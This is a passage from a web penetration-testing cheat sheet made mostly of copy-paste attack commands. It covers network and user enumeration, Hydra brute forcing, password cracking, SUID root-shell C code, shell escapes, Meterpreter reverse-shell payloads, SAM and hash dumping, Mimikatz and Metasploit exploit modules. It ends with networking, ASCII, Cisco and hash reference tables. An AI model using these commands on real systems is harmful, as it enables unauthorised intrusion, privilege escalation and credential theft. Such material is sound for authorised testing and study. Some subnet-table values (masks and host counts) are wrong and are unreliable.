for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>nbtscan 192.168.1.0/24</td> <td>Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain</td> </tr> <tr> <td>enum4linux -a target-ip</td> <td>Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing</td> </tr> </tbody> </table> <h3>Other Host Discovery</h3> <p>Other methods of host discovery, that don’t use nmap…</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>netdiscover -r 192.168.1.0/24</td> <td>Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site</td> </tr> </tbody> </table> <h3>SMB Enumeration</h3> <p>Enumerate Windows shares / Samba shares.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>nbtscan 192.168.1.0/24</td> <td>Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain</td> </tr> <tr> <td>enum4linux -a target-ip</td> <td>Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing</td> </tr> </tbody> </table> <h2>Python Local Web Server</h2> <p>Python local web server command, handy for serving up shells and exploits on an attacking machine.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>python -m SimpleHTTPServer 80</td> <td>Run a basic http server, great for serving up shells etc</td> </tr> </tbody> </table> <h2>Mounting File Shares</h2> <p>How to mount NFS / CIFS, Windows and Linux file shares.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>mount 192.168.1.1:/vol/share /mnt/nfs</td> <td>Mount NFS share to /mnt/nfs</td> </tr> <tr> <td>mount -t cifs -o username=user,password=pass<br> ,domain=blah //192.168.1.X/share-name /mnt/cifs</td> <td>Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)</td> </tr> <tr> <td>net use Z: \\win-server\share password<br> /user:domain\janedoe /savecred /p:no</td> <td>Mount a Windows share on Windows from the command line</td> </tr> <tr> <td>apt-get install smb4k -y</td> <td>Install smb4k on Kali, useful Linux GUI for browsing SMB shares</td> </tr> </tbody> </table> <h2>Basic FingerPrinting</h2> <p>A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>nc -v 192.168.1.1 25<p></p> <p>telnet 192.168.1.1 25</p></td> <td>Basic versioning / fingerprinting via displayed banner</td> </tr> </tbody> </table> <h2>SNMP Enumeration</h2> <p>SNMP enumeration is the process of using SNMP to enumerate user accounts on a target system. SNMP employs two major types of software components for communication: the SNMP agent, which is located on the networking device, and the SNMP management station, which communicates with the agent.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>snmpcheck -t 192.168.1.X -c public<p></p> <p>snmpwalk -c public -v1 192.168.1.X 1|<br> grep hrSWRunName|cut -d* * -f</p> <p>snmpenum -t 192.168.1.X</p> <p>onesixtyone -c names -i hosts</p></td> <td>SNMP enumeration</td> </tr> </tbody> </table> <h2>DNS Zone Transfers</h2> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>nslookup -&gt; set type=any -&gt; ls -d blah.com</td> <td>Windows DNS zone transfer</td> </tr> <tr> <td>dig axfr blah.com @ns1.blah.com</td> <td>Linux DNS zone transfer</td> </tr> </tbody> </table> <h2>DNSRecon</h2> <p>DNSRecon provides the ability to perform:</p> <ol> <li>Check all NS Records for Zone Transfers</li> <li>Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT)</li> <li>Perform common SRV Record Enumeration. Top Level Domain (TLD) Expansion</li> <li>Check for Wildcard Resolution</li> <li>Brute Force subdomain and host A and AAAA records given a domain and a wordlist</li> <li>Perform a PTR Record lookup for a given IP Range or CIDR</li> <li>Check a DNS Server Cached records for A, AAAA and CNAME Records provided a list of host records in a text file to check</li> <li>Enumerate Common mDNS records in the Local Network Enumerate Hosts and Subdomains using Google</li> </ol> <pre> DNS Enumeration Kali - DNSReconroot:~# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml</pre> <h2>HTTP / HTTPS Webserver Enumeration</h2> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>nikto -h 192.168.1.1</td> <td>Perform a nikto scan against target</td> </tr> <tr> <td>dirbuster</td> <td>Configure via GUI, CLI input doesn’t work most of the time</td> </tr> </tbody> </table> <h2>Packet Inspection</h2> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>tcpdump tcp port 80 -w output.pcap -i eth0</td> <td>tcpdump for port 80 on interface eth0, outputs to output.pcap</td> </tr> </tbody> </table> <h2>Username Enumeration</h2> <p>Some techniques used to remotely enumerate users on a target system.</p> <h3>SMB User Enumeration</h3> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>python /usr/share/doc/python-impacket-doc/examples<br> /samrdump.py 192.168.XXX.XXX</td> <td>Enumerate users from SMB</td> </tr> <tr> <td>ridenum.py 192.168.XXX.XXX 500 50000 dict.txt</td> <td>RID cycle SMB / enumerate users from SMB</td> </tr> </tbody> </table> <h3>SNMP User Enumeration</h3> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25<br> |cut -d” “ -f4</td> <td>Enmerate users from SNMP</td> </tr> <tr> <td>python /usr/share/doc/python-impacket-doc/examples/<br> samrdump.py SNMP 192.168.X.XXX</td> <td>Enmerate users from SNMP</td> </tr> <tr> <td>nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt<br> (then grep)</td> <td>Search for SNMP servers with nmap, grepable output</td> </tr> </tbody> </table> <h2>Passwords</h2> <h3>Wordlists</h3> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>/usr/share/wordlists</td> <td>Kali word lists</td> </tr> </tbody> </table> <p>Massive wordlist here at <a href="https://blog.g0tmi1k.com/2011/06/dictionaries-wordlists/" target="_blank">g0tm1lk’s blog</a></p> <h2>Brute Forcing Services</h2> <h3>Hydra FTP Brute Force</h3> <p>Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the synaptic package manager. On Kali Linux, it is per-installed.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f<br> 192.168.X.XXX ftp -V</td> <td>Hydra FTP brute force</td> </tr> </tbody> </table> <h3>Hydra POP3 Brute Force</h3> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f<br> 192.168.X.XXX pop3 -V</td> <td>Hydra POP3 brute force</td> </tr> </tbody> </table> <h3>Hydra SMTP Brute Force</h3> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V</td> <td>Hydra SMTP brute force</td> </tr> </tbody> </table> <p>Use -t to limit concurrent connections, example: -t 15</p> <h2>Password Cracking</h2> <h3>John The Ripper – JTR</h3> <p>John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations on a service daemon like ftp server or telnet server. John however needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked. Now a days hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and if the hash is made of a common word, then the site would show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. Larger the database, more the words covered.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>john –wordlist=/usr/share/wordlists/rockyou.txt hashes</td> <td>JTR password cracking</td> </tr> <tr> <td>john –format=descrypt –wordlist<br> /usr/share/wordlists/rockyou.txt hash.txt</td> <td>JTR forced descrypt cracking with wordlist</td> </tr> <tr> <td>john –format=descrypt hash –show</td> <td>JTR forced descrypt brute force cracking</td> </tr> </tbody> </table> <h2>Exploit Research</h2> <p>Ways to find exploits for enumerated hosts / services.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>searchsploit windows 2003 | grep -i local</td> <td>Search exploit-db for exploit, in this example windows 2003 + local esc</td> </tr> <tr> <td>site:exploit-db.com exploit kernel &lt;= 3</td> <td>Use google to search exploit-db.com for exploits</td> </tr> <tr> <td>grep -R “W7” /usr/share/metasploit-framework<br> /modules/exploit/windows/*</td> <td>Search metasploit modules using grep – msf search sucks a bit</td> </tr> </tbody> </table> <h2>Compiling Exploits</h2> <h3>Identifying if C code is for Windows or Linux</h3> <p>C #includes will indicate which OS should be used to build the exploit.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>process.h, string.h, winbase.h, windows.h, winsock2.h</td> <td>Windows exploit code</td> </tr> <tr> <td>arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,<br> sys/sockt.h, sys/types.h, unistd.h</td> <td>Linux exploit code</td> </tr> </tbody> </table> <h3>Build Exploit GCC</h3> <p>Compile exploit gcc.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>gcc -o exploit exploit.c</td> <td>Basic GCC compile</td> </tr> </tbody> </table> <h3>GCC Compile 32Bit Exploit on 64Bit Kali</h3> <p>Handy for cross compiling 32 bit binaries on 64 bit attacking machines.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>gcc -m32 exploit.c -o exploit</td> <td>Cross compile 32 bit binary on 64 bit Linux</td> </tr> </tbody> </table> <h3>Compile Windows .exe on Linux</h3> <p>Build / compile windows exploits on Linux, resulting in a .exe file.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe</td> <td>Compile windows .exe on Linux</td> </tr> </tbody> </table> <h2>SUID Binary</h2> <p>Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.</p> <p>below are some quick copy and pate examples for various shells:</p> <h3>SUID C Shell for /bin/bash</h3> <figure> <pre>int main(void){ setresuid(0, 0, 0); system("/bin/bash"); }</pre> </figure> <h3>SUID C Shell for /bin/sh</h3> <figure> <pre>int main(void){ setresuid(0, 0, 0); system("/bin/sh"); }</pre> </figure> <h3>Building the SUID Shell binary</h3> <figure> <pre>gcc -o suid suid.c</pre> </figure> <p>For 32 bit:</p> <figure> <pre>gcc -m32 -o suid suid.c</pre> </figure> <h2>TTY Shells</h2> <p>Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.</p> <h3>Python TTY Shell Trick</h3> <figure> <pre>python -c 'import pty;pty.spawn("/bin/bash")'</pre> </figure> <figure> <pre>echo os.system('/bin/bash')</pre> </figure> <h3>Spawn Interactive sh shell</h3> <figure> <pre>/bin/sh -i</pre> </figure> <h3>Spawn Perl TTY Shell</h3> <figure> <pre>exec "/bin/sh"; perl —e 'exec "/bin/sh";'</pre> </figure> <h3>Spawn Ruby TTY Shell</h3> <figure> <pre>exec "/bin/sh"</pre> </figure> <h3>Spawn Lua TTY Shell</h3> <figure> <pre>os.execute('/bin/sh')</pre> </figure> <h3>Spawn TTY Shell from Vi</h3> <p>Run shell commands from vi:</p> <figure> <pre>:!bash</pre> </figure> <h3>Spawn TTY Shell NMAP</h3> <figure> <pre>!sh</pre> </figure> <h2>Metasploit</h2> <p>Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.</p> <p>Like comparable commercial products such as Immunity’s Canvas or Core Security Technologies’ Core Impact, Metasploit can be used to test the vulnerability of computer systems or to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added two open core proprietary editions called Metasploit Express and Metasploit Pro.</p> <p>Metasploit’s emerging position as the de facto exploit development framework led to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk and remediation of that particular bug. Metasploit 3.0 began to include fuzzing tools, used to discover software vulnerabilities, rather than just exploits for known bugs. This avenue can be seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in August 2011.</p> <h3>Meterpreter Payloads</h3> <h3>Windows reverse meterpreter payload</h3> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>set payload windows/meterpreter/reverse_tcp</td> <td>Windows reverse tcp payload</td> </tr> </tbody> </table> <h3>Windows VNC Meterpreter payload</h3> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>set payload windows/vncinject/reverse_tcp<p></p> <p>set ViewOnly false</p></td> <td>Meterpreter Windows VNC Payload</td> </tr> </tbody> </table> <h3>Linux Reverse Meterpreter payload</h3> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>set payload linux/meterpreter/reverse_tcp</td> <td>Meterpreter Linux Reverse Payload</td> </tr> </tbody> </table> <h2>Meterpreter Cheat Sheet</h2> <p>Useful meterpreter commands.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>upload file c:\\windows</td> <td>Meterpreter upload file to Windows target</td> </tr> <tr> <td>download c:\\windows\\repair\\sam /tmp</td> <td>Meterpreter download file from Windows target</td> </tr> <tr> <td>download c:\\windows\\repair\\sam /tmp</td> <td>Meterpreter download file from Windows target</td> </tr> <tr> <td>execute -f c:\\windows\temp\exploit.exe</td> <td>Meterpreter run .exe on target – handy for executing uploaded exploits</td> </tr> <tr> <td>execute -f cmd -c</td> <td>Creates new channel with cmd shell</td> </tr> <tr> <td>ps</td> <td>Meterpreter show processes</td> </tr> <tr> <td>shell</td> <td>Meterpreter get shell on the target</td> </tr> <tr> <td>getsystem</td> <td>Meterpreter attempts priviledge escalation the target</td> </tr> <tr> <td>hashdump</td> <td>Meterpreter attempts to dump the hashes on the target</td> </tr> <tr> <td>portfwd add –l 3389 –p 3389 –r target</td> <td>Meterpreter create port forward to target machine</td> </tr> <tr> <td>portfwd delete –l 3389 –p 3389 –r target</td> <td>Meterpreter delete port forward</td> </tr> </tbody> </table> <h2>Common Metasploit Modules</h2> <h3>Remote Windows Metasploit Modules (exploits)</h3> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>use exploit/windows/smb/ms08_067_netapi</td> <td>MS08_067 Windows 2k, XP, 2003 Remote Exploit</td> </tr> <tr> <td>use exploit/windows/dcerpc/ms06_040_netapi</td> <td>MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit</td> </tr> <tr> <td>use exploit/windows/smb/<br> ms09_050_smb2_negotiate_func_index</td> <td>MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit</td> </tr> </tbody> </table> <h3>Local Windows Metasploit Modules (exploits)</h3> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>use exploit/windows/local/bypassuac</td> <td>Bypass UAC on Windows 7 + Set target + arch, x86/64</td> </tr> </tbody> </table> <h3>Auxilary Metasploit Modules</h3> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>use auxiliary/scanner/http/dir_scanner</td> <td>Metasploit HTTP directory scanner</td> </tr> <tr> <td>use auxiliary/scanner/http/jboss_vulnscan</td> <td>Metasploit JBOSS vulnerability scanner</td> </tr> <tr> <td>use auxiliary/scanner/mssql/mssql_login</td> <td>Metasploit MSSQL Credential Scanner</td> </tr> <tr> <td>use auxiliary/scanner/mysql/mysql_version</td> <td>Metasploit MSSQL Version Scanner</td> </tr> <tr> <td>use auxiliary/scanner/oracle/oracle_login</td> <td>Metasploit Oracle Login Module</td> </tr> </tbody> </table> <h3>Metasploit Powershell Modules</h3> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>use exploit/multi/script/web_delivery</td> <td>Metasploit powershell payload delivery module</td> </tr> <tr> <td>post/windows/manage/powershell/exec_powershell</td> <td>Metasploit upload and run powershell script through a session</td> </tr> <tr> <td>use exploit/multi/http/jboss_maindeployer</td> <td>Metasploit JBOSS deploy</td> </tr> <tr> <td>use exploit/windows/mssql/mssql_payload</td> <td>Metasploit MSSQL payload</td> </tr> </tbody> </table> <h3>Post Exploit Windows Metasploit Modules</h3> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>run post/windows/gather/win_privs</td> <td>Metasploit show privileges of current user</td> </tr> <tr> <td>use post/windows/gather/credentials/gpp</td> <td>Metasploit grab GPP saved passwords</td> </tr> <tr> <td>load mimikatz -&gt; wdigest</td> <td>Metasplit load Mimikatz</td> </tr> <tr> <td>run post/windows/gather/local_admin_search_enum</td> <td>Idenitfy other machines that the supplied domain user has administrative access to</td> </tr> </tbody> </table> <h2>Networking</h2> <h3>TTL Fingerprinting</h3> <table> <thead> <tr> <th>Operating System</th> <th>TTL Size</th> </tr> </thead> <tbody> <tr> <td>Windows</td> <td>128</td> </tr> <tr> <td>Linux</td> <td>64</td> </tr> <tr> <td>Solaris</td> <td>255</td> </tr> <tr> <td>Cisco / Network</td> <td>255</td> </tr> </tbody> </table> <h2>IPv4</h2> <h3>Classful IP Ranges</h3> <p>E.g Class A,B,C (depreciated)</p> <table> <thead> <tr> <th>Class</th> <th>IP Address Range</th> </tr> </thead> <tbody> <tr> <td>Class A IP Address Range</td> <td>0.0.0.0 – 127.255.255.255</td> </tr> <tr> <td>Class B IP Address Range</td> <td>128.0.0.0 – 191.255.255.255</td> </tr> <tr> <td>Class C IP Address Range</td> <td>192.0.0.0 – 223.255.255.255</td> </tr> <tr> <td>Class D IP Address Range</td> <td>224.0.0.0 – 239.255.255.255</td> </tr> <tr> <td>Class E IP Address Range</td> <td>240.0.0.0 – 255.255.255.255</td> </tr> </tbody> </table> <h3>IPv4 Private Address Ranges</h3> <table> <thead> <tr> <th>Class</th> <th>Range</th> </tr> </thead> <tbody> <tr> <td>Class A Private Address Range</td> <td>10.0.0.0 – 10.255.255.255</td> </tr> <tr> <td>Class B Private Address Range</td> <td>172.16.0.0 – 172.31.255.255</td> </tr> <tr> <td>Class C Private Address Range</td> <td>192.168.0.0 – 192.168.255.255</td> </tr> <tr> <td></td> <td>127.0.0.0 – 127.255.255.255</td> </tr> </tbody> </table> <h3>IPv4 Subnet Cheat Sheet</h3> <table> <thead> <tr> <th>CIDR</th> <th>Decimal Mask</th> <th>Number of Hosts</th> </tr> </thead> <tbody> <tr> <td>/31</td> <td>255.255.255.254</td> <td>1 Host</td> </tr> <tr> <td>/30</td> <td>255.255.255.252</td> <td>2 Hosts</td> </tr> <tr> <td>/29</td> <td>255.255.255.249</td> <td>6 Hosts</td> </tr> <tr> <td>/28</td> <td>255.255.255.240</td> <td>14 Hosts</td> </tr> <tr> <td>/27</td> <td>255.255.255.224</td> <td>30 Hosts</td> </tr> <tr> <td>/26</td> <td>255.255.255.192</td> <td>62 Hosts</td> </tr> <tr> <td>/25</td> <td>255.255.255.128</td> <td>126 Hosts</td> </tr> <tr> <td>/24</td> <td>255.255.255.0</td> <td>254 Hosts</td> </tr> <tr> <td>/23</td> <td>255.255.254.0</td> <td>512 Host</td> </tr> <tr> <td>/22</td> <td>255.255.252.0</td> <td>1022 Hosts</td> </tr> <tr> <td>/21</td> <td>255.255.248.0</td> <td>2046 Hosts</td> </tr> <tr> <td>/20</td> <td>255.255.240.0</td> <td>4094 Hosts</td> </tr> <tr> <td>/19</td> <td>255.255.224.0</td> <td>8190 Hosts</td> </tr> <tr> <td>/18</td> <td>255.255.192.0</td> <td>16382 Hosts</td> </tr> <tr> <td>/17</td> <td>255.255.128.0</td> <td>32766 Hosts</td> </tr> <tr> <td>/16</td> <td>255.255.0.0</td> <td>65534 Hosts</td> </tr> <tr> <td>/15</td> <td>255.254.0.0</td> <td>131070 Hosts</td> </tr> <tr> <td>/14</td> <td>255.252.0.0</td> <td>262142 Hosts</td> </tr> <tr> <td>/13</td> <td>255.248.0.0</td> <td>524286 Hosts</td> </tr> <tr> <td>/12</td> <td>255.240.0.0</td> <td>1048674 Hosts</td> </tr> <tr> <td>/11</td> <td>255.224.0.0</td> <td>2097150 Hosts</td> </tr> <tr> <td>/10</td> <td>255.192.0.0</td> <td>4194302 Hosts</td> </tr> <tr> <td>/9</td> <td>255.128.0.0</td> <td>8388606 Hosts</td> </tr> <tr> <td>/8</td> <td>255.0.0.0</td> <td>16777214 Hosts</td> </tr> </tbody> </table> <h2>ASCII Table Cheat Sheet</h2> <p>Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.</p> <table> <thead> <tr> <th>ASCII</th> <th>Character</th> </tr> </thead> <tbody> <tr> <td>x00</td> <td>Null Byte</td> </tr> <tr> <td>x08</td> <td>BS</td> </tr> <tr> <td>x09</td> <td>TAB</td> </tr> <tr> <td>x0a</td> <td>LF</td> </tr> <tr> <td>x0d</td> <td>CR</td> </tr> <tr> <td>x1b</td> <td>ESC</td> </tr> <tr> <td>x20</td> <td>SPC</td> </tr> <tr> <td>x21</td> <td>!</td> </tr> <tr> <td>x22</td> <td>“</td> </tr> <tr> <td>x23</td> <td>#</td> </tr> <tr> <td>x24</td> <td>$</td> </tr> <tr> <td>x25</td> <td>%</td> </tr> <tr> <td>x26</td> <td>&amp;</td> </tr> <tr> <td>x27</td> <td>`</td> </tr> <tr> <td>x28</td> <td>(</td> </tr> <tr> <td>x29</td> <td>)</td> </tr> <tr> <td>x2a</td> <td>*</td> </tr> <tr> <td>x2b</td> <td>+</td> </tr> <tr> <td>x2c</td> <td>,</td> </tr> <tr> <td>x2d</td> <td>–</td> </tr> <tr> <td>x2e</td> <td>.</td> </tr> <tr> <td>x2f</td> <td>/</td> </tr> <tr> <td>x30</td> <td>0</td> </tr> <tr> <td>x31</td> <td>1</td> </tr> <tr> <td>x32</td> <td>2</td> </tr> <tr> <td>x33</td> <td>3</td> </tr> <tr> <td>x34</td> <td>4</td> </tr> <tr> <td>x35</td> <td>5</td> </tr> <tr> <td>x36</td> <td>6</td> </tr> <tr> <td>x37</td> <td>7</td> </tr> <tr> <td>x38</td> <td>8</td> </tr> <tr> <td>x39</td> <td>9</td> </tr> <tr> <td>x3a</td> <td>:</td> </tr> <tr> <td>x3b</td> <td>;</td> </tr> <tr> <td>x3c</td> <td>&lt;</td> </tr> <tr> <td>x3d</td> <td>=</td> </tr> <tr> <td>x3e</td> <td>&gt;</td> </tr> <tr> <td>x3f</td> <td>?</td> </tr> <tr> <td>x40</td> <td>@</td> </tr> <tr> <td>x41</td> <td>A</td> </tr> <tr> <td>x42</td> <td>B</td> </tr> <tr> <td>x43</td> <td>C</td> </tr> <tr> <td>x44</td> <td>D</td> </tr> <tr> <td>x45</td> <td>E</td> </tr> <tr> <td>x46</td> <td>F</td> </tr> <tr> <td>x47</td> <td>G</td> </tr> <tr> <td>x48</td> <td>H</td> </tr> <tr> <td>x49</td> <td>I</td> </tr> <tr> <td>x4a</td> <td>J</td> </tr> <tr> <td>x4b</td> <td>K</td> </tr> <tr> <td>x4c</td> <td>L</td> </tr> <tr> <td>x4d</td> <td>M</td> </tr> <tr> <td>x4e</td> <td>N</td> </tr> <tr> <td>x4f</td> <td>O</td> </tr> <tr> <td>x50</td> <td>P</td> </tr> <tr> <td>x51</td> <td>Q</td> </tr> <tr> <td>x52</td> <td>R</td> </tr> <tr> <td>x53</td> <td>S</td> </tr> <tr> <td>x54</td> <td>T</td> </tr> <tr> <td>x55</td> <td>U</td> </tr> <tr> <td>x56</td> <td>V</td> </tr> <tr> <td>x57</td> <td>W</td> </tr> <tr> <td>x58</td> <td>X</td> </tr> <tr> <td>x59</td> <td>Y</td> </tr> <tr> <td>x5a</td> <td>Z</td> </tr> <tr> <td>x5b</td> <td>[</td> </tr> <tr> <td>x5c</td> <td>\</td> </tr> <tr> <td>x5d</td> <td>]</td> </tr> <tr> <td>x5e</td> <td>^</td> </tr> <tr> <td>x5f</td> <td>_</td> </tr> <tr> <td>x60</td> <td>`</td> </tr> <tr> <td>x61</td> <td>a</td> </tr> <tr> <td>x62</td> <td>b</td> </tr> <tr> <td>x63</td> <td>c</td> </tr> <tr> <td>x64</td> <td>d</td> </tr> <tr> <td>x65</td> <td>e</td> </tr> <tr> <td>x66</td> <td>f</td> </tr> <tr> <td>x67</td> <td>g</td> </tr> <tr> <td>x68</td> <td>h</td> </tr> <tr> <td>x69</td> <td>i</td> </tr> <tr> <td>x6a</td> <td>j</td> </tr> <tr> <td>x6b</td> <td>k</td> </tr> <tr> <td>x6c</td> <td>l</td> </tr> <tr> <td>x6d</td> <td>m</td> </tr> <tr> <td>x6e</td> <td>n</td> </tr> <tr> <td>x6f</td> <td>o</td> </tr> <tr> <td>x70</td> <td>p</td> </tr> <tr> <td>x71</td> <td>q</td> </tr> <tr> <td>x72</td> <td>r</td> </tr> <tr> <td>x73</td> <td>s</td> </tr> <tr> <td>x74</td> <td>t</td> </tr> <tr> <td>x75</td> <td>u</td> </tr> <tr> <td>x76</td> <td>v</td> </tr> <tr> <td>x77</td> <td>w</td> </tr> <tr> <td>x78</td> <td>x</td> </tr> <tr> <td>x79</td> <td>y</td> </tr> <tr> <td>x7a</td> <td>z</td> </tr> </tbody> </table> <h2>CISCO IOS Commands</h2> <p>A collection of useful Cisco IOS commands.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>enable</td> <td>Enters enable mode</td> </tr> <tr> <td>conf t</td> <td>Short for, configure terminal</td> </tr> <tr> <td>(config)# interface fa0/0</td> <td>Configure FastEthernet 0/0</td> </tr> <tr> <td>(config-if)# ip addr 0.0.0.0 255.255.255.255</td> <td>Add ip to fa0/0</td> </tr> <tr> <td>(config-if)# ip addr 0.0.0.0 255.255.255.255</td> <td>Add ip to fa0/0</td> </tr> <tr> <td>(config-if)# line vty 0 4</td> <td>Configure vty line</td> </tr> <tr> <td>(config-line)# login</td> <td>Cisco set telnet password</td> </tr> <tr> <td>(config-line)# password YOUR-PASSWORD</td> <td>Set telnet password</td> </tr> <tr> <td># show running-config</td> <td>Show running config loaded in memory</td> </tr> <tr> <td># show startup-config</td> <td>Show sartup config</td> </tr> <tr> <td># show version</td> <td>show cisco IOS version</td> </tr> <tr> <td># show session</td> <td>display open sessions</td> </tr> <tr> <td># show ip interface</td> <td>Show network interfaces</td> </tr> <tr> <td># show interface e0</td> <td>Show detailed interface info</td> </tr> <tr> <td># show ip route</td> <td>Show routes</td> </tr> <tr> <td># show access-lists</td> <td>Show access lists</td> </tr> <tr> <td># dir file systems</td> <td>Show available files</td> </tr> <tr> <td># dir all-filesystems</td> <td>File information</td> </tr> <tr> <td># dir /all</td> <td>SHow deleted files</td> </tr> <tr> <td># terminal length 0</td> <td>No limit on terminal output</td> </tr> <tr> <td># copy running-config tftp</td> <td>Copys running config to tftp server</td> </tr> <tr> <td># copy running-config startup-config</td> <td>Copy startup-config to running-config</td> </tr> </tbody> </table> <h2>Cryptography</h2> <h3>Hash Lengths</h3> <table> <thead> <tr> <th>Hash</th> <th>Size</th> </tr> </thead> <tbody> <tr> <td>MD5 Hash Length</td> <td>16 Bytes</td> </tr> <tr> <td>SHA-1 Hash Length</td> <td>20 Bytes</td> </tr> <tr> <td>SHA-256 Hash Length</td> <td>32 Bytes</td> </tr> <tr> <td>SHA-512 Hash Length</td> <td>64 Bytes</td> </tr> </tbody> </table> <h3>Hash Examples</h3> <p>Likely just use hash-identifier for this but here are some example hashes:</p> <table> <thead> <tr> <th>Hash</th> <th>Example</th> </tr> </thead> <tbody> <tr> <td>MD5 Hash Example</td> <td>8743b52063cd84097a65d1633f5c74f5</td> </tr> <tr> <td>MD5 $PASS:$SALT Example</td> <td>01dfae6e5d4d90d9892622325959afbe:7050461</td> </tr> <tr> <td>MD5 $SALT:$PASS</td> <td>f0fda58630310a6dd91a7d8f0a4ceda2:4225637426</td> </tr> <tr> <td>SHA1 Hash Example</td> <td>b89eaac7e61417341b710b727768294d0e6a277b</td> </tr> <tr> <td>SHA1 $PASS:$SALT</td> <td>2fc5a684737ce1bf7b3b239df432416e0dd07357:2014</td> </tr> <tr> <td>SHA1 $SALT:$PASS</td> <td>cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024</td> </tr> <tr> <td>SHA-256</td> <td>127e6fbfe24a750e72930c220a8e138275656b<br> 8e5d8f48a98c3c92df2caba935</td> </tr> <tr> <td>SHA-256 $PASS:$SALT</td> <td>c73d08de890479518ed60cf670d17faa26a4a7<br> 1f995c1dcc978165399401a6c4</td> </tr> <tr> <td>SHA-256 $SALT:$PASS</td> <td>eb368a2dfd38b405f014118c7d9747fcc97f4<br> f0ee75c05963cd9da6ee65ef498:560407001617</td> </tr> <tr> 